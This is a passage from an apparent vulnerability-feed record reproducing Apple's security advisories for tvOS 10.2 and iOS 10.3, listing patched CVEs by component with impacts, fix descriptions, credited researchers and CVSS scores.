1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A prototype access issue was addressed through improved exception handling.\n\nCVE-2017-2386: Andr\u00e9 Bargull\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2394: Apple\n\nCVE-2017-2396: Apple\n\nCVE-2016-9642: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2395: Apple\n\nCVE-2017-2454: Ivan Fratric of Google Project Zero, Zheng Huang of the Baidu Security Lab working with Trend Micro's Zero Day Initiative\n\nCVE-2017-2455: Ivan Fratric of Google Project Zero\n\nCVE-2017-2459: Ivan Fratric of Google Project Zero\n\nCVE-2017-2460: Ivan Fratric of Google Project Zero\n\nCVE-2017-2464: Natalie Silvanovich of Google Project Zero, Jeonghoon Shin\n\nCVE-2017-2465: Zheng Huang and Wei Yuan of Baidu Security Lab\n\nCVE-2017-2466: Ivan Fratric of Google Project Zero\n\nCVE-2017-2468: lokihardt of Google Project Zero\n\nCVE-2017-2469: lokihardt of Google Project Zero\n\nCVE-2017-2470: lokihardt of Google Project Zero\n\nCVE-2017-2476: Ivan Fratric of Google Project Zero\n\nCVE-2017-2481: 0011 working with Trend Micro's Zero Day Initiative\n\nEntry updated June 20, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed through improved memory handling.\n\nCVE-2017-2415: Kai Kang of Tencent's Xuanwu Lab (tentcent.com)\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to high memory consumption\n\nDescription: An uncontrolled resource consumption issue was addressed through improved regex processing.\n\nCVE-2016-9643: Gustavo Grieco\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: A malicious website may exfiltrate data cross-origin\n\nDescription: A validation issue existed in the handling of page loading. This issue was addressed through improved logic.\n\nCVE-2017-2367: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in the handling of frame objects. This issue was addressed with improved state management.\n\nCVE-2017-2445: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A logic issue existed in the handling of strict mode functions. This issue was addressed with improved state management.\n\nCVE-2017-2446: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may compromise user information\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2447: Natalie Silvanovich of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-2463: Kai Kang (4B5F5F4B) of Tencent's Xuanwu Lab (tencent.com) working with Trend Micro's Zero Day Initiative\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to universal cross site scripting\n\nDescription: A logic issue existed in frame handling. This issue was addressed through improved state management.\n\nCVE-2017-2475: lokihardt of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2479: lokihardt of Google Project Zero\n\nEntry added March 28, 2017\n\n**WebKit**\n\nAvailable for: Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may exfiltrate data cross-origin\n\nDescription: A validation issue existed in element handling. This issue was addressed through improved validation.\n\nCVE-2017-2480: lokihardt of Google Project Zero\n\nCVE-2017-2493: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n\n\n## Additional recognition\n\n**XNU**\n\nWe would like to acknowledge Lufeng Li of Qihoo 360 Vulcan Team for their assistance.\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-06-20T10:43:59", "title": "About the security content of tvOS 10.2 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2430", "CVE-2016-9643", "CVE-2017-2479", "CVE-2017-2461", "CVE-2017-2480", "CVE-2017-2450", "CVE-2017-2492", "CVE-2017-2395", "CVE-2016-3619", "CVE-2017-2441", "CVE-2017-2444", "CVE-2017-2435", "CVE-2017-2439", "CVE-2017-2447", "CVE-2017-2459", "CVE-2017-2379", "CVE-2017-2454", "CVE-2017-2428", "CVE-2017-2483", "CVE-2017-2456", "CVE-2017-2485", "CVE-2017-2455", "CVE-2017-2470", "CVE-2017-2469", "CVE-2017-2464", "CVE-2017-2396", "CVE-2017-2451", "CVE-2017-2465", "CVE-2017-2406", "CVE-2017-2474", "CVE-2017-2446", "CVE-2017-2472", "CVE-2017-2475", "CVE-2017-2468", "CVE-2017-2390", "CVE-2017-2417", "CVE-2017-2462", "CVE-2017-2487", "CVE-2017-2491", "CVE-2017-5029", "CVE-2017-2482", "CVE-2017-2466", "CVE-2017-2458", "CVE-2017-2448", "CVE-2017-2401", "CVE-2017-2481", "CVE-2017-2467", "CVE-2016-9642", "CVE-2017-2415", "CVE-2017-2490", "CVE-2017-2407", "CVE-2017-2473", "CVE-2017-2416", "CVE-2017-2394", "CVE-2017-2367", "CVE-2017-2386", "CVE-2017-2460", "CVE-2017-2463", "CVE-2017-2493", "CVE-2017-2445", "CVE-2017-2440", "CVE-2017-2476", "CVE-2017-2432", "CVE-2017-2478"], "modified": "2017-06-20T10:43:59", "id": "APPLE:HT207601", "href": "https://support.apple.com/kb/HT207601", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:43:31", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## iOS 10.3\n\nReleased March 27, 2017\n\n**Accounts**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A user may be able to view an Apple ID from the lock screen\n\nDescription: A prompt management issue was addressed by removing iCloud authentication prompts from the lock screen.\n\nCVE-2017-2397: Suprovici Vadim of UniApps team, an anonymous researcher\n\n**Audio**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted audio file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2430: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\nCVE-2017-2462: an anonymous researcher working with Trend Micro\u2019s Zero Day Initiative\n\n**Carbon**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted .dfont file may lead to arbitrary code execution\n\nDescription: A buffer overflow existed in the handling of font files. This issue was addressed through improved bounds checking.\n\nCVE-2017-2379: John Villamil, Doyensec, riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to a denial of service\n\nDescription: An infinite recursion was addressed through improved state management.\n\nCVE-2017-2417: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**CoreGraphics**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2444: Mei Wang of 360 GearTeam\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2435: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2450: John Villamil, Doyensec\n\n**CoreText**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted text message may lead to application denial of service\n\nDescription: A resource exhaustion issue was addressed through improved input validation.\n\nCVE-2017-2461: Isaac Archambault of IDAoADI, an anonymous researcher\n\n**DataAccess**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Configuring an Exchange account with a mistyped email address may resolve to an unexpected server\n\nDescription: An input validation issue existed in the handling of Exchange email addresses. This issue was addressed through improved input validation.\n\nCVE-2017-2414: Ilya Nesterov and Maxim Goncharov\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2487: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\nCVE-2017-2406: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Parsing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed through improved input validation.\n\nCVE-2017-2407: riusksk (\u6cc9\u54e5) of Tencent Security Platform Department\n\n**FontParser**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted font may result in the disclosure of process memory\n\nDescription: An out-of-bounds read was addressed through improved input validation.\n\nCVE-2017-2439: John Villamil, Doyensec\n\n**HomeKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Home Control may unexpectedly appear on Control Center\n\nDescription: A state issue existed in the handling of Home Control. This issue was addressed through improved validation.\n\nCVE-2017-2434: Suyash Narain of India\n\n**HTTPProtocol**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious HTTP/2 server may be able to cause undefined behavior\n\nDescription: Multiple issues existed in nghttp2 before 1.17.0. These were addressed by updating nghttp2 to version 1.17.0.\n\nCVE-2017-2428\n\nEntry updated March 28, 2017\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2416: Qidan He (\u4f55\u6dc7\u4e39, @flanker_hqd) of KeenLab, Tencent\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Viewing a maliciously crafted JPEG file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2432: an anonymous researcher working with Trend Micro's Zero Day Initiative\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2467\n\n**ImageIO**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted image may lead to unexpected application termination\n\nDescription: An out-of-bound read existed in LibTIFF versions before 4.0.7. This was addressed by updating LibTIFF in ImageIO to version 4.0.7.\n\nCVE-2016-3619\n\n**iTunes Store**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker in a privileged network position may be able to tamper with iTunes network traffic\n\nDescription: Requests to iTunes sandbox web services were sent in cleartext. This was addressed by enabling HTTPS.\n\nCVE-2017-2412: Richard Shupak (linkedin.com/in/rshupak)\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2491: Apple\n\nEntry added May 2, 2017\n\n**JavaScriptCore**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted web page may lead to universal cross site scripting\n\nDescription: A prototype issue was addressed through improved logic.\n\nCVE-2017-2492: lokihardt of Google Project Zero\n\nEntry updated April 24, 2017\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2398: Lufeng Li of Qihoo 360 Vulcan Team\n\nCVE-2017-2401: Lufeng Li of Qihoo 360 Vulcan Team\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An integer overflow was addressed through improved input validation.\n\nCVE-2017-2440: an anonymous researcher\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with root privileges\n\nDescription: A race condition was addressed through improved memory handling.\n\nCVE-2017-2456: lokihardt of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2472: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A malicious application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed through improved input validation.\n\nCVE-2017-2473: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: An off-by-one issue was addressed through improved bounds checking.\n\nCVE-2017-2474: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A race condition was addressed through improved locking.\n\nCVE-2017-2478: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow issue was addressed through improved memory handling.\n\nCVE-2017-2482: Ian Beer of Google Project Zero\n\nCVE-2017-2483: Ian Beer of Google Project Zero\n\n**Kernel**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with elevated privileges\n\nDescription: A memory corruption issue was addressed through improved memory handling.\n\nCVE-2017-2490: Ian Beer of Google Project Zero, The UK's National Cyber Security Centre (NCSC)\n\nEntry added March 31, 2017\n\n**Keyboards**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2458: Shashank (@cyberboyIndia)\n\n**Keychain**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker who is able to intercept TLS connections may be able to read secrets protected by iCloud Keychain.\n\nDescription: In certain circumstances, iCloud Keychain failed to validate the authenticity of OTR packets. This issue was addressed through improved validation.\n\nCVE-2017-2448: Alex Radocea of Longterm Security, Inc.\n\nEntry updated March 30, 2017\n\n**libarchive**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local attacker may be able to change file system permissions on arbitrary directories\n\nDescription: A validation issue existed in the handling of symlinks. This issue was addressed through improved validation of symlinks.\n\nCVE-2017-2390: Omer Medan of enSilo Ltd\n\n**libc++abi**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Demangling a malicious C++ application may lead to arbitrary code execution\n\nDescription: A use after free issue was addressed through improved memory management.\n\nCVE-2017-2441\n\n**libxslt**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Multiple vulnerabilities in libxslt\n\nDescription: Multiple memory corruption issues were addressed through improved memory handling.\n\nCVE-2017-5029: Holger Fuhrmannek\n\nEntry added March 28, 2017\n\n**Pasteboard**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A person with physical access to an iOS device may read the pasteboard\n\nDescription: The pasteboard was encrypted with a key protected only by the hardware UID. This issue was addressed by encrypting the pasteboard with a key protected by the hardware UID and the user's passcode.\n\nCVE-2017-2399\n\n**Phone**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A third party app can initiate a phone call without user interaction\n\nDescription: An issue existed in iOS allowing for calls without prompting. This issue was addressed by prompting a user to confirm call initiation.\n\nCVE-2017-2484\n\n**Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An attacker may be able to exploit weaknesses in the DES cryptographic algorithm\n\nDescription: Support for the 3DES cryptographic algorithm was added to the SCEP client and DES was deprecated.\n\nCVE-2017-2380: an anonymous researcher\n\n**Quick Look**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Tapping a tel link in a PDF document could trigger a call without prompting the user\n\nDescription: An issue existed when checking the tel URL before initiating calls. This issue was addressed with the addition of a confirmation prompt.\n\nCVE-2017-2404: Tuan Anh Ngo (Melbourne, Australia), Christoph Nehring\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A state management issue was addressed by disabling text input until the destination page loads.\n\nCVE-2017-2376: an anonymous researcher, Michal Zalewski of Google Inc, Muneaki Nishimura (nishimunea) of Recruit Technologies Co., Ltd., Chris Hlady of Google Inc, an anonymous researcher, Yuyang Zhou of Tencent Security Platform Department (security.tencent.com)\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: A local user may be able to discover websites a user has visited in Private Browsing\n\nDescription: An issue existed in SQLite deletion. This issue was addressed through improved SQLite cleanup.\n\nCVE-2017-2384\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing maliciously crafted web content may present authentication sheets over arbitrary web sites\n\nDescription: A spoofing and denial-of-service issue existed in the handling of HTTP authentication. This issue was addressed through making HTTP authentication sheets non-modal.\n\nCVE-2017-2389: ShenYeYinJiu of Tencent Security Response Center, TSRC\n\n**Safari**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website by clicking a link may lead to user interface spoofing\n\nDescription: A spoofing issue existed in the handling of FaceTime prompts. This issue was addressed through improved input validation.\n\nCVE-2017-2453: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**Safari Reader**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Enabling the Safari Reader feature on a maliciously crafted webpage may lead to universal cross site scripting\n\nDescription: Multiple validation issues were addressed through improved input sanitization.\n\nCVE-2017-2393: Erling Ellingsen\n\n**SafariViewController**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Cache state is not properly kept in sync between Safari and SafariViewController when a user clears Safari cache\n\nDescription: An issue existed in clearing Safari cache information from SafariViewController. This issue was addressed by improving cache state handling.\n\nCVE-2017-2400: Abhinav Bansal of Zscaler, Inc.\n\n**Sandbox Profiles**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation\n\nImpact: A malicious application may be able to access the iCloud user record of a signed in user\n\nDescription: An access issue was addressed through additional sandbox restrictions on third party applications.\n\nCVE-2017-6976: George Dan (@theninjaprawn)\n\nEntry added August 1, 2017\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Validating empty signatures with SecKeyRawVerify() may unexpectedly succeed\n\nDescription: An validation issue existed with cryptographic API calls. This issue was addressed through improved parameter validation.\n\nCVE-2017-2423: an anonymous researcher\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: An application may be able to execute arbitrary code with root privileges\n\nDescription: A buffer overflow was addressed through improved bounds checking.\n\nCVE-2017-2451: Alex Radocea of Longterm Security, Inc.\n\n**Security**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Processing a maliciously crafted x509 certificate may lead to arbitrary code execution\n\nDescription: A memory corruption issue existed in the parsing of certificates. This issue was addressed through improved input validation.\n\nCVE-2017-2485: Aleksandar Nikolic of Cisco Talos\n\n**Siri**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Siri might reveal text message contents while the device is locked\n\nDescription: An insufficient locking issue was addressed with improved state management.\n\nCVE-2017-2452: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Dragging and dropping a maliciously crafted link may lead to bookmark spoofing or arbitrary code execution\n\nDescription: A validation issue existed in bookmark creation. This issue was addressed through improved input validation.\n\nCVE-2017-2378: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th generation and later, iPod touch 6th generation and later\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed through improved state management.\n\nCVE-2017-2486: redrain of light4freedom\n\n**WebKit**\n\nAvailable for: iPhone 5 and later, iPad 4th 